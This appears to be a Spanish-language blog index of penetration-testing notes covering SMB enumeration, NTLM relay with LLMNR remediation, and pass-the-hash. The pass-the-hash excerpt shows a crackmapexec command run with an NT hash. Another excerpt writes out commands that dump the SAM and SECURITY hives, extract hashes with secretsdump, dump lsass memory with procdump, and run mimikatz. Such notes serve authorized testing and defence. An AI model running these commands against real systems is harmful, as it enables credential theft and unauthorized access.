Pentesting SMB

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smbhttps://github.com/ShawnDEvans/smbmap Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”

NTLM Relay

https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name Read more ›

Diferentes maneras de emplear el Pass the Hash (PTH)

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/ Crackmapexec cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.localSMB         10.0.0.20     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB         10.0.0.20 Read more ›

Dump credentials, hash ntlm v1, pth, cracking hash ntlm

https://pure.security/dumping-windows-credentials/ Registros C:> reg.exe save hklm\sam c:\temp\sam.saveC:> reg.exe save hklm\security c:\temp\security.saveC:> reg.exe save hklm\system c:\temp\system.save Password Hashes (Impacket) $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Credenciales en memoria (Procdump) C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 C:> mimikatz.exe Read more ›